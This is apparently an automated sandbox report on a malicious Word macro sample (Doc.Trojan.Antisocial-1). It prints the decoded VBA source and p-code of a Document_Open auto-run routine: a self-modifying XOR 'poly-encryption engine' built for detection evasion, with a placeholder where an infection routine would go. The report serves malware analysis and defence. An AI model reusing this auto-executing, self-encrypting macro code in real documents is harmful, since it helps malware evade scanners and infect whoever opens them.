Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains VBA macros. The 'Document_Open' macro is present, which is a common technique for executing malicious code upon opening the document. The script employs a custom poly-encryption engine, suggesting an attempt to evade detection. The primary function of the script appears to be obfuscating its own code and preparing for further execution, likely involving a second-stage payload.
Heuristics (3):
- ClamAV: Doc.Trojan.Antisocial-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Antisocial-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4892 bytes |

SHA-256: 1cc9ae4e7d0e32a5189b29ef941f261f9c3f943f54813a8572ac6b6fbfd3343e
Detection: ClamAV: Doc.Trojan.Antisocial-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul 1"
'
'=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
' AntiSocial Poly-Encryption Engine v.1.0
'By Lys Kovick For The Alcoholic Anarchists of America (AAA)
'=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'
Private Sub Document_Open()
    ' Decodes lines 17-28 of the first VBA component in place: in each stored line,
    ' character 2 XOR 39 gives the key and characters 3 onward are the XOR-encoded text.
    For V1 = 17 To 28 '//Adjust V1 For Line Changes!
        V2 = Null
        V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
        V4 = Asc((Mid(V3, 2, 1)))
        V5 = V4 Xor 39
        For V6 = 3 To Len(V3)
            V7 = Asc(Mid(V3, V6, 1)) Xor V5
            V2 = V2 & Chr(V7)
        Next V6
        V8 = V2
        ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V8
    Next V1
    Call VM
End Sub

Private Sub VM()
    ' Re-encodes the same lines with a fresh random key (1-8) and writes them back
    ' as comments, so the stored lines differ after each run (the "poly" part).
    For V1 = 17 To 28 '//Adjust V1 For Line Changes!
        V2 = Null
        V3 = "'" & (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
        V4 = Int(Rnd() * 8) + 1
        For V5 = 1 To Len(V3)
            V6 = Asc(Mid(V3, V5, 1)) Xor V4
            V2 = V2 & Chr(V6)
        Next V5
        V7 = V2
        ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, "'" & V7
    Next V1
    '//Put Infection Routine Here...
End Sub
' Processing file: /opt/analyzer/scan_staging/4b6d7c8c4bc04dc683c1052cfd57285c.bin
' ===============================================================================
' Module streams:
'   Macros/VBA/ThisDocument - 903 bytes
'   Macros/VBA/Modul 1 - 2779 bytes
' p-code listing (one source line per comment line, instructions separated by ";"):
' Line #0: QuoteRem 0x0000 0x0000 ""
' Line #1: QuoteRem 0x0000 0x003B "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
' Line #2: QuoteRem 0x0000 0x0031 " AntiSocial Poly-Encryption Engine v.1.0"
' Line #3: QuoteRem 0x0000 0x003B "By Lys Kovick For The Alcoholic Anarchists of America (AAA)"
' Line #4: QuoteRem 0x0000 0x003B "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
' Line #5: QuoteRem 0x0000 0x0000 ""
' Line #6:
' Line #7: FuncDefn (Private Sub Document_Open())
' Line #8: StartForVariable; Ld V1; EndForVariable; LitDI2 0x0011; LitDI2 0x001C; For; QuoteRem 0x0012 0x001D "//Adjust V1 For Line Changes!"
' Line #9: LitVarSpecial (Null); St V2
' Line #10: Ld V1; LitDI2 0x0001; LitDI2 0x0001; Ld ThisDocument; MemLd VBProject; MemLd VBComponents; ArgsMemLd Item 0x0001; MemLd CodeModule; ArgsMemLd Lines 0x0002; Paren; St V3
' Line #11: Ld V3; LitDI2 0x0002; LitDI2 0x0001; ArgsLd Mid$ 0x0003; Paren; ArgsLd Asc 0x0001; St V4
' Line #12: Ld V4; LitDI2 0x0027; Xor; St V5
' Line #13: StartForVariable; Ld V6; EndForVariable; LitDI2 0x0003; Ld V3; FnLen; For
' Line #14: Ld V3; Ld V6; LitDI2 0x0001; ArgsLd Mid$ 0x0003; ArgsLd Asc 0x0001; Ld V5; Xor; St V7
' Line #15: Ld V2; Ld V7; ArgsLd Chr 0x0001; Concat; St V2
' Line #16: StartForVariable; Ld V6; EndForVariable; NextVar
' Line #17: Ld V2; St V8
' Line #18: Ld V1; Ld V8; LitDI2 0x0001; Ld ThisDocument; MemLd VBProject; MemLd VBComponents; ArgsMemLd Item 0x0001; MemLd CodeModule; ArgsMemCall ReplaceLine 0x0002
' Line #19: StartForVariable; Ld V1; EndForVariable; NextVar
' Line #20: ArgsCall (Call) VM 0x0000
' Line #21: EndSub
' Line #22: FuncDefn (Private Sub VM())
' Line #23: StartForVariable; Ld V1; EndForVariable; LitDI2 0x0011; LitDI2 0x001C; For; QuoteRem 0x0012 0x001D "//Adjust V1 For Line Changes!"
' Line #24: LitVarSpecial (Null); St V2
' Line #25: LitStr 0x0001 "'"; Ld V1; LitDI2 0x0001; LitDI2 0x0001; Ld ThisDocument; MemLd VBProject; MemLd VBComponents; ArgsMemLd Item 0x0001; MemLd CodeModule; ArgsMemLd Lines 0x0002; Paren; Concat; St V3
' Line #26: ArgsLd Rnd 0x0000; LitDI2 0x0008; Mul; FnInt; LitDI2 0x0001; Add; St V4
' Line #27: ... (truncated)
```